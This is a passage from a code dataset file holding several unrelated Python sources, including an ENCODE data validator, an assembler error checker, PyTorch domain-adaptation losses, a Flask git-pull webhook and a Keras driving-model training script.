checksum_fastq = subprocess.check_output([\n                        './BamHash/bamhash_checksum_fastq',\n                        file_names[0], paired_file])\n                except subprocess.CalledProcessError as e:\n                    checksum['notification'] = 'Process error'\n                    return checksum\n                file_names.append(paired_file)\n            else:\n                print("Calculating checksum for - " + file_names[0])\n                try:\n                    checksum_fastq = subprocess.check_output([\n                        './BamHash/bamhash_checksum_fastq', '-P', file_names[0]])\n                except subprocess.CalledProcessError as e:\n                    checksum['notification'] = 'Process error'\n                    return checksum\n            if f['replicate']['biological_replicate_number'] not in \\\n                    checksum['fastq']:\n                checksum['fastq'][biological_rep] = {}\n            checksum['fastq'][biological_rep][technical_rep] = checksum_fastq\n        for filename in file_names:\n            subprocess.check_output(['rm', filename])\n    return checksum\n\n\ndef get_assay_JSON(url):\n    """\n    Input URL and outputs required properties.\n    """\n    path = url + '&' + urlencode(_PARAMS, True)\n    response = requests.get(path)\n    for exp in response.json()['@graph']:\n        yield exp\n\n\ndef bigBedToBed(filename):\n    try:\n        subprocess.check_output(['./bigBedToBed', filename, filename + '.txt'])\n    except:\n        subprocess.check_output(['rm', filename, filename + '.txt'])\n        print("Failed to convert bigBed to bed")\n        return\n\n    df = pd.read_csv(filename + '.txt', delimiter='\\t', header=None)\n\n    try:\n        subprocess.check_output(['rm', filename, filename + '.txt'])\n    except:\n        print("Error converting bigBed to bed - " + filename)\n    return df\n\n\ndef compare_files(bb, bed):\n    """\n    Compare number of peaks first and then content\n    """\n    result = True\n    bb_filename = get_file('/files/' + bb + '/@@download/' + bb + '.bigBed')\n    if bb_filename is None:\n        result = False\n    bb_df = bigBedToBed(bb_filename)\n\n    bed_filename = get_file('/files/' + bed + '/@@download/' + bed + '.bed.gz')\n    if bed_filename is None:\n        result = False\n    bed_df = pd.read_csv(bed_filename, delimiter='\\t', compression='gzip', header=None)\n    if len(bb_df.columns) == 12:\n        bb_df = bb_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n        bed_df = bed_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n    else:\n        bb_df = bb_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8])\n        bed_df = bed_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8])\n    bb_df.index = range(1, len(bb_df) + 1)\n    bed_df.index = range(1, len(bed_df) + 1)\n\n    try:\n        assert_frame_equal(bb_df, bed_df)\n    except:\n        result = False\n    try:\n        subprocess.check_output(['rm', bed_filename])\n    except:\n        print("Unable to remove bed file")\n    print(bb + ' ' + bed + ' ' + str(result))\n    return result\n\n\ndef parse_tsv(filename):\n    with open(filename) as tsvfile:\n        tsvreader = csv.reader(tsvfile, 
delimiter="\\t")\n        for line in tsvreader:\n            yield line\n\n\ndef main():\n    import argparse\n    parser = argparse.ArgumentParser(\n        description="Validate files in each experiment",\n        epilog=EPILOG,\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n    )\n    group = parser.add_mutually_exclusive_group(required=True)\n    group.add_argument('--url', help="ENCODE assay search URL")\n    group.add_argument('--file', help="File with UUID or accessions")\n    parser.add_argument('--type', help="Data checking type. Options: bed, bam",\n                        required=True)\n\n    args = parser.parse_args()\n    if args.type == 'bam':\n        # per-experiment checksums keyed by accession\n        results = {}\n        for exp in get_assay_JSON(args.url):\n            results[exp['accession']] = validate_data(exp)\n    elif args.type == 'bed':\n        results = []\n        for row in parse_tsv(args.file):\n            # append the comparison outcome to the row, then record the row\n            row.append(compare_files(row[1], row[0]))\n            results.append(row)\n    else:\n        print("Invalid option entered.")\n        return\n\n    with open('data.json', 'w') as outfile:\n        json.dump(results, outfile)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"548756566","text":"# case where any other instruction can call labels - will give a typo\ncorrect = ("add", "sub", "ld", "st", "mul", "div", "rs", "ls", "xor", "or", "and", "not", "cmp", "jmp", "jlt", "jgt",\n           "je", "hlt", "mov", "var")\n\ntypeA = ("add", "sub", "mul", "xor", "or", "and")\ntypeB = ("rs", "ls")\ntypeC = ("div", "not", "cmp")\ntypeD = ("ld", "st")\ntypeE = ("jmp", "jlt", "jgt", "je")\n\n\ndef error_A(lin, line_no):  # ADD R0 R1 R2\n    if not(len(lin) == 4):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if len(lin[1]) != 2 or len(lin[2]) != 2 or len(lin[3]) != 2 or lin[1][0] != "R" or lin[2][0] != "R" or lin[3][\n            0] != "R":\n        print(f"ERROR: Typo in register name declaration on line {line_no}")\n        return True\n\n    for i in range(1, 4):\n        if lin[i][1].isalpha() or int(lin[i][1]) > 6 or int(lin[i][1]) < 0:\n            print(f"ERROR: Illegal register name on line {line_no}")\n            return True\n\n    return False\n\n\ndef error_B(lin, line_no):  # rs R1 $5\n    if not(len(lin) == 3):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if lin[1][0] != "R" or lin[2][0] != "$":\n        print(f"ERROR: Typo in register/immediate declaration on line {line_no}")\n        return True\n\n    if lin[1][1].isalpha() or int(lin[1][1]) > 6 or int(lin[1][1]) < 0:\n        print(f"ERROR: Illegal register name on line {line_no}")\n        return True\n\n    if int(lin[2][1:]) > 255 or int(lin[2][1:]) < 0:\n        print(f"ERROR: Illegal immediate value in line {line_no}")\n        return True\n\n    return False\n\n\ndef error_C(lin, line_no):  # div R2 R3\n    if not(len(lin) == 3):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if len(lin[1]) != 2 or len(lin[2]) != 2 or lin[1][0] != "R" or lin[2][0] != "R":\n        print(f"ERROR: Typo in register name on line {line_no}")\n        return True\n\n    for i in range(1, 3):\n        if lin[i][1].isalpha() or int(lin[i][1]) > 6 or int(lin[i][1]) < 0:\n            print(f"ERROR: Illegal register name declaration on line {line_no}")\n            return True\n\n    return False\n\n\ndef error_D(lin, line_no):  # ld R1 X\n    if not(len(lin) == 3):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if len(lin[1]) != 2 or lin[1][0] != "R":\n        print(f"ERROR: Typo in register name on line {line_no}")\n        return True\n\n    if 
lin[1][1].isalpha() or int(lin[1][1]) > 6 or int(lin[1][1]) < 0:\n        print(f"ERROR: Illegal register name declaration on line {line_no}")\n        return True\n\n    return False\n\n\ndef error_E(lin, line_no):  # jmp X\n    if not(len(lin) == 2):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    return False\n\n\ndef error_mov(lin, line_no):  # mov R1 $4 / mov R1 R2 / mov R1 FLAGS\n    if not(len(lin) == 3):\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if lin[1][0] != 'R' or len(lin[1]) != 2 or lin[1][1].isalpha() or int(lin[1][1:]) > 6 or int(lin[1][1:]) < 0:\n        print(f"ERROR: Illegal register declaration on line {line_no}")\n        return True\n\n    if lin[2][0] != '$' and lin[2][0] != 'R' and lin[2] != 'FLAGS':\n        print(f"ERROR: Incorrect syntax in line {line_no}")\n        return True\n\n    if (lin[2][0] == 'R') and (len(lin[2]) != 2 or lin[2][1].isalpha() or int(lin[2][1:]) > 6 or int(lin[2][1:]) < 0):\n        print(f"ERROR: Illegal register declaration on line {line_no}")\n        return True\n\n    if (lin[2][0] == '$') and (int(lin[2][1:]) < 0 or int(lin[2][1:]) > 255):\n        print(f"ERROR: Illegal immediate value in line {line_no}")\n        return True\n\n    return False\n\n\ndef check(file):  # main function of the program\n    line_no = 0\n    instruct_count = 0\n    defined_var = []\n    defined_label = []\n    temp = True  # no instruction seen yet, so 'var' declarations are still allowed\n\n    last = [x for x in file[-1].split()]\n    i = -1\n    pos = len(file)\n    while True:\n        if len(last) == 0:  # an empty line\n            if len(file) > -i:  # if all empty lines present\n                i -= 1\n                last = [x for x in file[i].split()]\n            else:\n                print(f"ERROR in line {pos}: halt is not the last instruction.")\n                return True\n\n        if len(last) != 0 and last[0] != "hlt" and (':' not in file[i]):\n            print(f"ERROR in line {pos}: halt is not the last instruction.")\n            return True\n\n        if len(last) != 0 and ':' in file[i]:\n            hlt_label_check = last\n            if len(hlt_label_check) != 2:\n                print(f"ERROR in line {pos}: halt is not the last instruction.")\n                return True\n            if hlt_label_check[0][-1] == ':' and hlt_label_check[1] != 'hlt':\n                print(f"ERROR in line {pos}: halt is not the last instruction.")\n                return True\n\n        if len(last) != 0 and (('hlt' == last[0]) or (':' == last[0][-1] and 'hlt' == last[1])):\n            break\n\n        pos -= 1\n\n    position = 0\n    for label in file:  # Updating labels in list\n        position += 1\n        lin = [x for x in label.split()]\n        if len(lin) == 0:  # an empty line\n            continue\n\n        elif ':' not in lin[0]:  # not a label\n            continue\n\n        elif ':' in lin[0]:\n            if ':' != lin[0][-1]:\n                print(f"ERROR: Syntax error in line {position}")\n                return True\n\n            elif ':' == lin[0][-1]:\n                name = lin[0][:-1]\n                if name in defined_label:\n                    print(f"ERROR in line {position}: Label was already defined")\n                    return True\n                defined_label.append(name)\n\n    for line in file[:i]:  # iterate over each line except last\n        lin = [x for x in line.split()]\n        line_no += 1\n\n        if len(lin) == 0:  # empty lines skipped\n            continue\n\n        if ':' == lin[0][-1]:\n            temp = False\n            instruct_count += 1\n            name = lin[0][:-1]\n            if name in defined_var:\n                print(f"ERROR in line {line_no}: A variable of the same name is defined earlier")\n                return True\n            lin = lin[1:]\n\n        if len(lin) == 0:  # empty labels skipped\n            continue\n\n        if lin[0] not in correct:  # checks first word in line\n            print(f"ERROR: Typo in line {line_no}")\n            return True\n\n        if lin[0] == 'hlt':\n            print(f"ERROR in line {line_no}: halt is used multiple times")\n            return True\n\n        elif lin[0] == 'var' and temp:\n            instruct_count += 1\n            if len(lin) != 2:\n                print(f"ERROR: 
Incorrect syntax in line {line_no}")\n                return True\n\n            elif lin[1] in defined_var:\n                print(f"ERROR in line {line_no}: Variable was already defined")\n                return True\n\n            if lin[1] not in defined_label:\n                defined_var.append(lin[1])\n            else:\n                print(f"ERROR in line {line_no}: Label of the same name was defined earlier")\n                return True\n\n        elif lin[0] in typeA:\n            temp = False\n            instruct_count += 1\n            if error_A(lin, line_no):\n                return True\n\n        elif lin[0] in typeB:\n            temp = False\n            instruct_count += 1\n            if error_B(lin, line_no):\n                return True\n\n        elif lin[0] in typeC:\n            temp = False\n            instruct_count += 1\n            if error_C(lin, line_no):\n                return True\n\n        elif lin[0] in typeD:\n            temp = False\n            instruct_count += 1\n            if lin[2] not in defined_var and lin[2] in defined_label:\n                print(f"ERROR in line {line_no}: Misuse of label as variable")\n                return True\n\n            elif lin[2] not in defined_label and lin[2] not in defined_var:\n                v = lin[2]\n                print(f"ERROR in line {line_no}: Variable ({v}) not defined in the program")\n                return True\n\n            elif error_D(lin, line_no):\n                return True\n\n        elif lin[0] in typeE:\n            temp = False\n            instruct_count += 1\n            if lin[1] not in defined_label and lin[1] in defined_var:\n                print(f"ERROR in line {line_no}: Misuse of variable as label")\n                return True\n\n            elif lin[1] not in defined_label and lin[1] not in defined_var:\n                v = lin[1]\n                print(f"ERROR in line {line_no}: Label ({v}) not defined in the program")\n                return True\n\n            elif error_E(lin, line_no):\n                return True\n\n        elif lin[0] == 'mov':\n            temp = False\n            instruct_count += 1\n            if error_mov(lin, line_no):\n                return True\n\n        elif lin[0] == 'var' and not temp:\n            print(f"ERROR in line {line_no}: Variable declared after instruction")\n            return True\n\n        elif instruct_count > 256:\n            print("ERROR: Number of instructions exceeds 256")\n            return True\n\n    return False\n\n","sub_path":"Simple-Assembler/Checkerror.py","file_name":"Checkerror.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363007311","text":"from abc import ABC, abstractmethod\nfrom typing import List\nimport io\nimport sqlalchemy as sql\n\nfrom schools3.data.base.processor import Processor\nfrom schools3.config.data import db_config\n\n# a wrapper for a table of data. Specified as either a Dataframe or a SQL query\nclass SchoolsTable(Processor):\n    def __init__(self, table_name, columns: List[sql.Column], schema_name=db_config.write_schema_name, debug=False):\n        super(SchoolsTable, self).__init__(debug=debug)\n\n        self.table_name = table_name\n        self.schema = schema_name\n        self.columns = columns\n        self.meta = sql.MetaData()\n        self.table = sql.Table(\n            table_name, self.meta,\n            *columns,\n            schema=self.schema\n        )\n\n    # write this table to the database if it does not exist\n    def maybe_create(self):\n        if not self.engine.has_table(self.table_name, schema=self.schema):\n            self.table.create(self.engine)\n\n    # abstract method to get SQL query for this table\n    @abstractmethod\n    def get_data_query(self):\n        pass\n\n    # abstract method to get the Dataframe for this table\n    @abstractmethod\n    def _get_df(self):\n        pass\n\n    # writes data into the database using a Dataframe\n    def insert_from_df(self, use_native_copy=True):\n        df = self._get_df()\n        table_name = self.table_name\n        schema = self.schema\n\n        assert not self.engine.has_table(table_name, schema=schema), \\\n            f'Table {schema}.{table_name} already exists. 
Quitting'\n\n if use_native_copy:\n df[:0].to_sql(\n table_name, self.engine, schema=schema,\n index=False\n ) # create raw skeleton of table\n\n data_buf = io.StringIO()\n df.to_csv(data_buf, index=False, header=False)\n data_buf.seek(0)\n\n conn = self.engine.raw_connection()\n ps_curs = conn.cursor()\n\n ps_curs.copy_from(\n data_buf,\n table=f'{schema}.{table_name}',\n sep=',',\n null=''\n )\n\n conn.commit()\n ps_curs.close()\n\n else:\n df.to_sql(\n table_name, self.engine, schema=schema,\n index=False\n )\n\n # writes data into the database using a query\n def insert_from_query(self):\n data_query = self.get_data_query()\n\n assert len(data_query.c) == len(self.columns),\\\n 'number of columns in data query do not match' +\\\n 'the number specifed in __init__'\n\n self.maybe_create()\n ins = self.table.insert().from_select(data_query.c, data_query)\n with self.engine.begin() as conn:\n conn.engine.execute(ins)\n","sub_path":"schools3/data/base/schools_table.py","file_name":"schools_table.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"654433995","text":"import bleach\nimport markdown\nfrom django import template\nfrom ..models import HeroGuide\n\nregister = template.Library()\n\nALLOWED_TAGS = [\n 'a',\n 'abbr',\n 'acronym',\n 'b',\n 'blockquote',\n 'code',\n 'em',\n 'h1',\n 'h2',\n 'h3',\n 'h4',\n 'h5',\n 'h6',\n 'i',\n 'li',\n 'ol',\n 'p',\n 'pre',\n 'strong',\n 'table',\n 'td',\n 'th',\n 'tr',\n 'ul',\n]\n\n\n@register.filter\ndef markdownify(text):\n untrusted_text = markdown.markdown(text)\n html = bleach.clean(untrusted_text, tags=ALLOWED_TAGS)\n html = bleach.linkify(html)\n return html\n\n\n@register.inclusion_tag('core/include/hero_guides_by_user.html', takes_context=True)\ndef hero_guides_by_user(context, object):\n request = context['request']\n hero_guides = HeroGuide.objects.filter(author=object.user)\n\n return {\n 'request': request,\n 'hero_guides': hero_guides,\n }\n\n\n@register.simple_tag(name='hero_guides_count_user')\ndef hero_guides_count_user(object):\n return HeroGuide.objects.filter(author=object.user).count()\n","sub_path":"overwatch/core/templatetags/posts_tag.py","file_name":"posts_tag.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"361411651","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import Function\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom functools import partial\nimport numpy as np\nimport torch.nn as nn\nimport pdb\nfrom itertools import combinations\nimport torch.nn.functional as F\nclass ReverseLayerF(Function):\n\n @staticmethod\n def forward(ctx, x, p):\n ctx.p = p\n\n return x.view_as(x)\n\n @staticmethod\n def backward(ctx, grad_output):\n output = grad_output.neg() * ctx.p\n\n return output, None\n\ndef pairwise_distance(x, y):\n\n if not len(x.shape) == len(y.shape) == 2:\n raise ValueError('Both inputs should be matrices.')\n\n if x.shape[1] != y.shape[1]:\n raise ValueError('The number of features should be the same.')\n\n x = x.view(x.shape[0], x.shape[1], 1)\n y = torch.transpose(y, 0, 1)\n output = torch.sum((x - y) ** 2, 1)\n output = torch.transpose(output, 0, 1)\n\n return output\n\ndef gaussian_kernel_matrix(x, y, sigmas):\n\n sigmas = sigmas.view(sigmas.shape[0], 1)\n beta = 1. / (2. 
* sigmas)\n    dist = pairwise_distance(x, y).contiguous()\n    dist_ = dist.view(1, -1)\n    s = torch.matmul(beta, dist_)\n\n    return torch.sum(torch.exp(-s), 0).view_as(dist)\n\ndef maximum_mean_discrepancy(x, y, kernel=gaussian_kernel_matrix):\n\n    cost = torch.mean(kernel(x, x))\n    cost += torch.mean(kernel(y, y))\n    cost -= 2 * torch.mean(kernel(x, y))\n\n    return cost\n\ndef mmd_loss(source_features, target_features):\n\n    sigmas = [\n        1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 5, 10, 15, 20, 25, 30, 35, 100,\n        1e3, 1e4, 1e5, 1e6\n    ]\n    if torch.cuda.is_available():\n        gaussian_kernel = partial(\n            gaussian_kernel_matrix, sigmas=Variable(torch.cuda.FloatTensor(sigmas))\n        )\n    else:\n        gaussian_kernel = partial(\n            gaussian_kernel_matrix, sigmas=Variable(torch.FloatTensor(sigmas))\n        )\n    loss_value = maximum_mean_discrepancy(source_features, target_features, kernel=gaussian_kernel)\n\n    return loss_value\n\ndef triplet_loss(features, labels):\n    #model.train()\n    #emb = model(batch["X"].cuda())\n    #y = batch["y"].cuda()\n    #pdb.set_trace()\n\n    #with torch.no_grad():\n    triplets = get_triplets(features, labels)\n    f_A = features[triplets[:, 0].cuda()]\n    f_P = features[triplets[:, 1].cuda()]\n    f_N = features[triplets[:, 2].cuda()]\n\n    ap_D = (f_A - f_P).pow(2).sum(1)  # .pow(.5)\n    an_D = (f_A - f_N).pow(2).sum(1)  # .pow(.5)\n    losses = F.relu(ap_D - an_D + 1.)\n\n    return losses.mean()\n\n\ndef center_loss(tgt_model, batch, src_model, src_centers, tgt_centers,\n                src_kmeans, tgt_kmeans, margin=1):\n    # triplets = self.triplet_selector.get_triplets(embeddings, target, embeddings_adv=embeddings_adv)\n    # triplets = triplets.cuda()\n\n    #f_N = embeddings_adv[triplets[:, 2]]\n\n    f_N_clf = tgt_model.convnet(batch["X"].cuda()).view(batch["X"].shape[0], -1)\n    f_N = tgt_model.fc(f_N_clf.detach())\n\n    #est.predict(f_N.cpu().numpy())\n    y_src = src_kmeans.predict(f_N.detach().cpu().numpy())\n    #ap_distances = (emb_centers[None] - f_N[:,None]).pow(2).min(1)[0].sum(1)\n    ap_distances = (src_centers[y_src] - f_N).pow(2).sum(1)\n    #ap_distances = (f_C[None] - f_N[:,None]).pow(2).sum(1).sum(1)\n\n    #an_distances = 0\n    losses = ap_distances.mean()\n\n    # y_tgt = tgt_kmeans.predict(f_N.detach().cpu().numpy())\n    # ap_distances = (tgt_centers[y_tgt] - f_N).pow(2).max(1)[0]\n\n    # losses += ap_distances.mean()*0.1\n\n    # f_P = src_model(batch["X"].cuda())\n    #an_distances = (f_P - f_N).pow(2).sum(1)\n    #losses -= an_distances.mean() * 0.1\n\n    return losses\n\n\n### Triplets Utils\n\ndef extract_embeddings(model, dataloader):\n    model.eval()\n    n_samples = dataloader.batch_size * len(dataloader)\n    embeddings = np.zeros((n_samples, model.n_outputs))\n    labels = np.zeros(n_samples)\n    k = 0\n\n    for images, target in dataloader:\n        with torch.no_grad():\n            images = images.cuda()\n            embeddings[k:k+len(images)] = model.get_embedding(images).data.cpu().numpy()\n            labels[k:k+len(images)] = target.numpy()\n            k += len(images)\n\n    return embeddings, labels\n\ndef get_triplets(embeddings, y):\n\n    margin = 1\n    D = pdist(embeddings)\n    D = D.cpu()\n\n    y = y.cpu().data.numpy().ravel()\n    trip = []\n\n    for label in set(y):\n        label_mask = (y == label)\n        label_indices = np.where(label_mask)[0]\n        if len(label_indices) < 2:\n            continue\n        neg_ind = np.where(np.logical_not(label_mask))[0]\n\n        ap = list(combinations(label_indices, 2))  # All anchor-positive pairs\n        ap = np.array(ap)\n\n        ap_D = D[ap[:, 0], ap[:, 1]]\n\n        # # GET HARD NEGATIVE\n        # if np.random.rand() < 0.5:\n        #     trip += get_neg_hard(neg_ind, hardest_negative,\n        #                          D, ap, ap_D, margin)\n        # else:\n        trip += get_neg_hard(neg_ind, hardest_negative,\n                             D, ap, ap_D, 
margin)\n # else:\n trip += get_neg_hard(neg_ind, hardest_negative,\n D, ap, ap_D, margin)\n\n if len(trip) == 0:\n ap = ap[0]\n trip.append([ap[0], ap[1], neg_ind[0]])\n\n trip = np.array(trip)\n\n return torch.LongTensor(trip)\n\n\n\n\ndef pdist(vectors):\n D = -2 * vectors.mm(torch.t(vectors)) \n D += vectors.pow(2).sum(dim=1).view(1, -1) \n D += vectors.pow(2).sum(dim=1).view(-1, 1)\n\n return D\n\n\ndef get_neg_hard(neg_ind, \n select_func,\n D, ap, ap_D, margin):\n trip = []\n\n for ap_i, ap_di in zip(ap, ap_D):\n loss_values = (ap_di - \n D[torch.LongTensor(np.array([ap_i[0]])), \n torch.LongTensor(neg_ind)] + margin)\n\n loss_values = loss_values.data.cpu().numpy()\n neg_hard = select_func(loss_values)\n\n if neg_hard is not None:\n neg_hard = neg_ind[neg_hard]\n trip.append([ap_i[0], ap_i[1], neg_hard])\n\n return trip\n\ndef random_neg(loss_values):\n neg_hards = np.where(loss_values > 0)[0]\n return np.random.choice(neg_hards) if len(neg_hards) > 0 else None\n\ndef hardest_negative(loss_values):\n hard_negative = np.argmax(loss_values)\n return hard_negative if loss_values[hard_negative] > 0 else None\n\ndef semihard_negative(loss_values, margin=1):\n semihard_negatives = np.where(np.logical_and(loss_values < margin, loss_values > 0))[0]\n return np.random.choice(semihard_negatives) if len(semihard_negatives) > 0 else None\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601979161","text":"import requests\nimport datetime\n\nfrom config import Config\n\n\ndef call_api_by_id(city_id, api_id):\n weather = {'city_id': city_id, 'date': datetime.datetime.now()}\n res = requests.get(\"http://api.openweathermap.org/data/2.5/weather\",\n params={'id': api_id, 'units': 'metric', 'lang': 'ru', 'APPID': Config.APIKEY})\n data = res.json()\n if data['cod'] == 401:\n return -1\n weather['temp'], weather['weather'], weather['pressure'] = data['main']['temp'], data['weather'][0]['main'], \\\n data['main']['pressure']\n return weather\n","sub_path":"app/weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631213992","text":"## Fibonacci numbers using Bottom up DP\n\ndef Fib(n):\n fib = [0]*10000\n fib[0] = 1\n fib[1] = 1\n for i in range(2,n+1):\n fib[i] = fib[i-1]+fib[i-2]\n \n return fib[n]\n\nif __name__ == \"__main__\":\n print(Fib(250))","sub_path":"DS ALGO/Dynamic Programming/Fibonacci numbers using botoom up Dp.py","file_name":"Fibonacci numbers using botoom up Dp.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"8827965","text":"from flask import Flask\nimport os\nimport sys\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hook():\n os.system('git pull')\n return 'hello world!'\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=int(sys.argv[1]))\n","sub_path":"static/hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314220628","text":"import pygame.font\r\n\r\nclass Scoreboard():\r\n def __init__(self, ai_settings, screen, stats):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text_color = (0, 0, 
0)\r\n self.font = pygame.font.SysFont(None, 48)\r\n\r\n self.prep_score()\r\n\r\n def prep_score(self):\r\n score_str = str(self.stats.step)\r\n self.score_image = self.font.render(score_str, True, self.text_color)\r\n\r\n def show_score(self):\r\n self.screen.blit(self.score_image, (780, 245))\r\n\r\nclass Timeboard():\r\n def __init__(self, ai_settings, screen, stats):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text_color = (0, 0, 0)\r\n self.font = pygame.font.SysFont(None, 48)\r\n\r\n self.prep_time()\r\n\r\n def prep_time(self):\r\n time_str = str(self.stats.time) + 's'\r\n self.time_image = self.font.render(time_str, True, self.text_color)\r\n\r\n def show_time(self):\r\n self.screen.blit(self.time_image, (780, 390))\r\n\r\nclass Showboard():\r\n def __init__(self, ai_settings, screen, stats, msg, x, y, size, color):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text = msg\r\n self.text_color = color\r\n self.font = pygame.font.SysFont('方正粗黑宋简体', size)\r\n self.rect = screen.get_rect()\r\n self.x = x\r\n self.y = y\r\n\r\n self.prep_msg()\r\n\r\n def prep_msg(self):\r\n self.msg_image = self.font.render(self.text, True, self.text_color)\r\n self.msg_image_rect = self.msg_image.get_rect()\r\n self.msg_image_rect.center = (self.x, self.y)\r\n\r\n def show_msg(self):\r\n self.screen.blit(self.msg_image, self.msg_image_rect)","sub_path":"原型实现/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158518748","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\nimport sklearn.utils\nimport pandas as pd\n\nH5_FILE = \"model_{0}.h5\" # where to store the trained model\nCSV_FILE = \"model_{0}.csv\" # where to store training and test validation performance\nAUG_FACTOR = 6 # augmentation factor by which to multiply each data point / image in order to get correct batch size\nMODEL = \"nvidia\" # pipeline to be used for training\n\n# generator function to get batch of data\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n # take number of samples into current batch\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n measurements = []\n for batch_sample in batch_samples:\n # also take left and right images\n for source_path_column, measurement_correction in zip([0, 1, 2], [0.0, 0.1, -0.1]):\n source_path = batch_sample[source_path_column]\n filename = source_path.split(\"/\")[-1]\n current_path = 'data/IMG/' + filename\n image = cv2.imread(current_path)\n # correct for odd cv2 BGR representation\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n images.append(image)\n measurement = float(batch_sample[3])\n measurements.append(measurement + measurement_correction)\n # data augmentation by flipping axis horizontally\n augmented_images, augmented_measurements = [], []\n for image, measurement in zip(images, measurements):\n augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement*-1.0)\n X_train = np.array(augmented_images)\n y_train = np.array(augmented_measurements)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# retrieving all data from CSV except the first line 
(header)\nsamples = []\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n skipline = True\n for line in reader:\n if skipline == True:\n skipline = False\n else:\n samples.append(line)\n\n# train-test split with test size 20%\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\n# model definition and training\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, ELU\n\n# first layers normalize data and crop the lane segments at the bottom\nmodel = Sequential()\nmodel.add(Lambda(lambda x: x/255.0-0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\nhistory = None\n\nif MODEL == \"nvidia\":\n # NVidia pipeline\n model.add(Convolution2D(24,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(36,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(48,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\n model.add(Flatten())\n model.add(Dense(100))\n model.add(Dense(50))\n model.add(Dense(10))\n model.add(Dense(1))\n model.compile(loss='mse', optimizer='adam')\n history = model.fit_generator(train_generator, validation_data=validation_generator,\n samples_per_epoch=len(train_samples)*AUG_FACTOR, nb_val_samples=len(validation_samples)*AUG_FACTOR,\n nb_epoch=5)\nelif MODEL == \"commaai\":\n # Comma.ai model\n model.add(Convolution2D(16,8,8,subsample=(4,4),border_mode=\"same\",activation=\"elu\"))\n model.add(Convolution2D(32,5,5,subsample=(2,2),border_mode=\"same\",activation=\"elu\"))\n model.add(Convolution2D(64,5,5,subsample=(2,2),border_mode=\"same\",activation=\"elu\"))\n model.add(Flatten())\n model.add(Dropout(.2))\n model.add(ELU())\n model.add(Dense(512))\n model.add(Dropout(.5))\n model.add(ELU())\n model.add(Dense(1))\n model.compile(loss='mse', optimizer='adam')\n history = model.fit_generator(train_generator, validation_data=validation_generator,\n samples_per_epoch=len(train_samples)*AUG_FACTOR, nb_val_samples=len(validation_samples)*AUG_FACTOR,\n nb_epoch=5)\n\n# save trained model\nmodel.save(H5_FILE.format(MODEL))\n# save history data / train-validation performance\nhistory_dict = {'loss': history.history['loss'], 'val_loss': history.history['val_loss']}\npd.DataFrame(data=history_dict).to_csv(CSV_FILE.format(MODEL), 